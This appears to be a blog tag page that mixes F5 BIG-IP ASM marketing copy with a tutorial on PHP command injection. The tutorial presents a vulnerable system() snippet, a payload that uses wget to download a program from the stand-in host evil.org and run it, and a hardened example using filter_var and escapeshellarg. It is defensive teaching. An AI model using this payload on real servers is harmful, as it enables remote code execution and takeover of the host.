Posts Tagged SQL injection

Built-in Compliance Capabilities

Advanced, built-in security protection and remote auditing help your organization comply with industry security standards, including Payment Card Industry Data Security Standard (PCI DSS), HIPAA, Basel II, and SOX, in a cost-effective way—without requiring multiple appliances, application changes, or rewrites. BIG-IP ASM reports previously unknown threats, such as layer 7 denial-of-service (DoS) and SQL injection attacks, and it mitigates web application threats to shield the organization from data breaches. All reports are GUI-driven and provide drill-down options with a click.


PCI reporting

With PCI reporting, BIG-IP ASM lists security measures required by PCI DSS 1.2, determines if compliance is being met, and details steps required to become compliant if not.

Geolocation reporting

Geolocation reporting informs you of the country where threats originate in addition to attack type, violation, URL, IP address, severity, and more. You can also schedule reports to be sent to a designated email address automatically for up-to-date reporting.


Easy-to-read format for remote auditing

BIG-IP ASM makes security compliance easier and saves valuable IT time by exporting policies in human readable format. The flat, readable XML file format enables auditors to view the policies off site. Auditors working remotely can view, select, review, and test policies without requiring time and support from the web application security administrator.


Command Injection

A successful command injection attack lets the attacker run arbitrary commands on the server with the privileges of the web application process, which is frequently enough to take over the host.

When user input is used as part of a system command, an attacker may be able to inject shell commands through that input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell-based CGI, and less common in Java, Python, and C#, where the usual APIs do not pass a command string through a shell. Consider the following PHP code snippet:

<?php
$email_subject = "some subject";
if (isset($_GET['email'])) {
    // Vulnerable: the email parameter is concatenated straight into a shell command line
    system("mail " . $_GET['email'] . " -s '" . $email_subject . "' < /tmp/email_body", $return_val);
}
?>

The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] -s 'some subject' < /tmp/email_body

The puzzle piece needs to let the mail command run and exit. For example, mail --help will run and exit; in fact, because a semicolon (;) runs the next command regardless of whether the previous one succeeded, the attacker only needs the leading fragment to be something the shell can parse. The attacker then appends additional shell commands separated by semicolons. Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

--help; wget http://evil.org/attack_program; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail --help; wget http://evil.org/attack_program; ./attack_program # -s 'some subject' < /tmp/email_body

This is equivalent to this:

mail --help; wget http://evil.org/attack_program; ./attack_program

This runs mail --help, then downloads attack_program from evil.org and executes it, letting the attacker run arbitrary commands on the vulnerable web server. Note that the input never had to be a valid e-mail address: nothing in the snippet validates it, and nothing quotes it before the shell sees it.
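The fix has two parts, and the snippet above is missing both: refuse input that is not shaped like an e-mail address, and quote whatever survives so the shell treats it as a single literal argument. The following is an added example, not code from the original post; it rebuilds the same mail(1) command line (the /tmp/email_body file and "some subject" are taken from the snippet) and exposes the vulnerable and hardened builders side by side so the effect of the payload can be compared:

```php
<?php
// Added example: the vulnerable builder from the post beside a hardened version.
// Both return the command string that would be passed to system(); nothing is executed here.

function build_mail_cmd_vulnerable(string $email, string $subject): string
{
    // Mirrors the original snippet: the value is spliced straight into the command line,
    // so ';' and '#' in $email are interpreted by the shell.
    return "mail " . $email . " -s '" . $subject . "' < /tmp/email_body";
}

function build_mail_cmd_safe(string $email, string $subject): ?string
{
    // 1. Allow-list validation: refuse anything that is not a syntactically valid address
    //    before a command line is even assembled.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // 2. A valid address may still begin with '-', which mail(1) would parse as an option
    //    (argument injection). Quoting does not prevent that, so reject it explicitly.
    if ($email[0] === '-') {
        return null;
    }
    // 3. escapeshellarg() wraps each value in single quotes and escapes embedded quotes, so
    //    ';', '#', '|', '$(...)' and backticks reach mail as literal characters, not shell syntax.
    return 'mail ' . escapeshellarg($email)
         . ' -s ' . escapeshellarg($subject)
         . ' < /tmp/email_body';
}

// The payload from the post, as a constructed test input.
$payload = "--help; wget http://evil.org/attack_program; ./attack_program #";

echo build_mail_cmd_vulnerable($payload, 'some subject'), PHP_EOL;
var_dump(build_mail_cmd_safe($payload, 'some subject'));
echo build_mail_cmd_safe('alice@example.com', 'some subject'), PHP_EOL;

// In the real handler, only the hardened string is ever handed to the shell:
// $cmd = build_mail_cmd_safe($_GET['email'] ?? '', $email_subject);
// if ($cmd !== null) { system($cmd, $return_val); }
?>
```

Run with the payload, the vulnerable builder reproduces the command line shown above, while the hardened builder returns null because the value contains spaces and no "@" and therefore never passes filter_var(). For a legitimate address the hardened builder emits the address and subject inside single quotes, which is what escapeshellarg() produces on POSIX systems. Validation and quoting are deliberately both present: quoting alone leaves option injection open, and validation alone is one regex bug away from a shell metacharacter getting through. Where possible, avoid the shell entirely (PHP's mail() or a mail library) so there is no command line to inject into.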


Defend Against Web Attacks and Achieve Regulatory Compliance

With the continued growth of web application traffic, an increasing amount of sensitive data is exposed to potential theft, security vulnerabilities, and multi-layer attacks. Protect your organization and its reputation by maintaining the confidentiality, availability, and performance of the applications that are critical to your business.

Key benefits

Ensure app security and availability

Get comprehensive attack protection, including geolocation-based controls, against layer 7 distributed denial of service (DDoS), SQL injection, and OWASP Top Ten attacks, and secure the latest interactive AJAX applications and JSON payloads.

Reduce costs and enable compliance

Achieve security standards compliance with built-in application protection.

Get out-of-the-box app security policies

Provide protection with pre-built rapid deployment policies and minimal configuration.

Improve app security and performance

Enable advanced application security while accelerating performance and improving cost effectiveness.

Deploy flexibly and increase agility

Focus on fast application development and flexible deployment in virtual and cloud environments with automatic security policies.
